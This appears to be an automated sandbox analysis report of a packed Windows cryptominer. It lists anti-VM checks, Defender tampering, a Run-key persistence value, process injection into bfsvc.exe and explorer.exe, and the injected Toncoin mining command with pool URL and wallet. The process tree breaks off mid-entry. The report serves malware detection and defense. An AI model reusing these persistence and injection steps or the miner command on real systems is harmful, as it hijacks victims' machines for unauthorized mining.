43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

Analysis

max time kernel
152s
max time network
134s
platform
windows10_x64
resource
win10-en-20211208
submitted
27-01-2022 12:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe
Size

6.3MB
MD5

7e80c2ae5587b824d8230e782089e86b
SHA1

90f0912a29b9cc7a55bd4b561e1a574e005cecf6
SHA256

43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c
SHA512

db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Score

10^/10

evasion persistence themida trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Executes dropped EXE 14 IoCs

Processes:

RegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe

pid	process
432	RegHost.exe
4056	RegHost.exe
1516	RegHost.exe
2960	RegHost.exe
2328	RegHost.exe
1428	RegHost.exe
2856	RegHost.exe
436	RegHost.exe
592	RegHost.exe
2736	RegHost.exe
356	RegHost.exe
2076	RegHost.exe
3624	RegHost.exe
1676	RegHost.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1060-118-0x0000000140000000-0x000000014274C000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 30 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe

Themida packer 54 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/3704-115-0x00007FF6A7860000-0x00007FF6A81A9000-memory.dmp	themida
behavioral1/memory/3704-116-0x00007FF6A7860000-0x00007FF6A81A9000-memory.dmp	themida
behavioral1/memory/3704-117-0x00007FF6A7860000-0x00007FF6A81A9000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/432-123-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/432-124-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/432-125-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/4056-130-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/4056-131-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/4056-132-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/1516-137-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/1516-138-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/1516-139-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/2960-144-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2960-145-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2960-146-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/2328-151-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2328-152-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2328-153-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/2856-159-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2856-160-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2856-161-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/436-166-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/436-167-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/436-168-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/592-173-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/592-174-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/592-175-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/2736-180-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2736-181-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2736-182-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/356-187-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/356-188-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/356-189-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/2076-194-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2076-195-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/2076-196-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral1/memory/3624-201-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/3624-202-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
behavioral1/memory/3624-203-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida

Adds Run key to start application 2 TTPs 15 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe

Checks whether UAC is enabled 1 TTPs 15 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

RegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe

Suspicious use of SetThreadContext 28 IoCs

Processes:

43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe

description	pid	process	target process
PID 3704 set thread context of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 set thread context of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 432 set thread context of 3412	432	RegHost.exe	bfsvc.exe
PID 432 set thread context of 3716	432	RegHost.exe	explorer.exe
PID 4056 set thread context of 376	4056	RegHost.exe	bfsvc.exe
PID 4056 set thread context of 1292	4056	RegHost.exe	explorer.exe
PID 1516 set thread context of 1716	1516	RegHost.exe	bfsvc.exe
PID 1516 set thread context of 1904	1516	RegHost.exe	explorer.exe
PID 2960 set thread context of 356	2960	RegHost.exe	bfsvc.exe
PID 2960 set thread context of 372	2960	RegHost.exe	explorer.exe
PID 2328 set thread context of 3212	2328	RegHost.exe	bfsvc.exe
PID 2328 set thread context of 3968	2328	RegHost.exe	explorer.exe
PID 2856 set thread context of 928	2856	RegHost.exe	bfsvc.exe
PID 2856 set thread context of 2288	2856	RegHost.exe	explorer.exe
PID 436 set thread context of 1508	436	RegHost.exe	bfsvc.exe
PID 436 set thread context of 2064	436	RegHost.exe	explorer.exe
PID 592 set thread context of 1516	592	RegHost.exe	bfsvc.exe
PID 592 set thread context of 2036	592	RegHost.exe	explorer.exe
PID 2736 set thread context of 3040	2736	RegHost.exe	bfsvc.exe
PID 2736 set thread context of 2280	2736	RegHost.exe	explorer.exe
PID 356 set thread context of 3228	356	RegHost.exe	bfsvc.exe
PID 356 set thread context of 3644	356	RegHost.exe	explorer.exe
PID 2076 set thread context of 3860	2076	RegHost.exe	bfsvc.exe
PID 2076 set thread context of 3656	2076	RegHost.exe	explorer.exe
PID 3624 set thread context of 1240	3624	RegHost.exe	bfsvc.exe
PID 3624 set thread context of 3000	3624	RegHost.exe	explorer.exe
PID 1676 set thread context of 3460	1676	RegHost.exe	bfsvc.exe
PID 1676 set thread context of 3544	1676	RegHost.exe	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

explorer.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
1156	explorer.exe
1156	explorer.exe
1156	explorer.exe
1156	explorer.exe
1156	explorer.exe
1156	explorer.exe
1156	explorer.exe
1156	explorer.exe
1156	explorer.exe
1156	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
3716	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1292	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe
1904	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exeexplorer.exeRegHost.exeexplorer.exeRegHost.exe

description	pid	process	target process
PID 3704 wrote to memory of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 wrote to memory of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 wrote to memory of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 wrote to memory of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 wrote to memory of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 wrote to memory of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 wrote to memory of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 wrote to memory of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 wrote to memory of 1060	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	bfsvc.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 3704 wrote to memory of 1156	3704	43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe	explorer.exe
PID 1156 wrote to memory of 432	1156	explorer.exe	RegHost.exe
PID 1156 wrote to memory of 432	1156	explorer.exe	RegHost.exe
PID 432 wrote to memory of 3412	432	RegHost.exe	bfsvc.exe
PID 432 wrote to memory of 3412	432	RegHost.exe	bfsvc.exe
PID 432 wrote to memory of 3412	432	RegHost.exe	bfsvc.exe
PID 432 wrote to memory of 3412	432	RegHost.exe	bfsvc.exe
PID 432 wrote to memory of 3412	432	RegHost.exe	bfsvc.exe
PID 432 wrote to memory of 3412	432	RegHost.exe	bfsvc.exe
PID 432 wrote to memory of 3412	432	RegHost.exe	bfsvc.exe
PID 432 wrote to memory of 3412	432	RegHost.exe	bfsvc.exe
PID 432 wrote to memory of 3412	432	RegHost.exe	bfsvc.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 432 wrote to memory of 3716	432	RegHost.exe	explorer.exe
PID 3716 wrote to memory of 4056	3716	explorer.exe	RegHost.exe
PID 3716 wrote to memory of 4056	3716	explorer.exe	RegHost.exe
PID 4056 wrote to memory of 376	4056	RegHost.exe	bfsvc.exe
PID 4056 wrote to memory of 376	4056	RegHost.exe	bfsvc.exe
PID 4056 wrote to memory of 376	4056	RegHost.exe	bfsvc.exe
PID 4056 wrote to memory of 376	4056	RegHost.exe	bfsvc.exe
PID 4056 wrote to memory of 376	4056	RegHost.exe	bfsvc.exe
PID 4056 wrote to memory of 376	4056	RegHost.exe	bfsvc.exe
PID 4056 wrote to memory of 376	4056	RegHost.exe	bfsvc.exe
PID 4056 wrote to memory of 376	4056	RegHost.exe	bfsvc.exe

C:\Users\Admin\AppData\Local\Temp\43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe
"C:\Users\Admin\AppData\Local\Temp\43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c.exe"
1⤵
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3704

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
2⤵
PID:1060

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1156

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
4⤵
PID:3412

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3716

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
6⤵
PID:376

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1292

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1516

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
8⤵
PID:1716

C:\Windows\explorer.exe
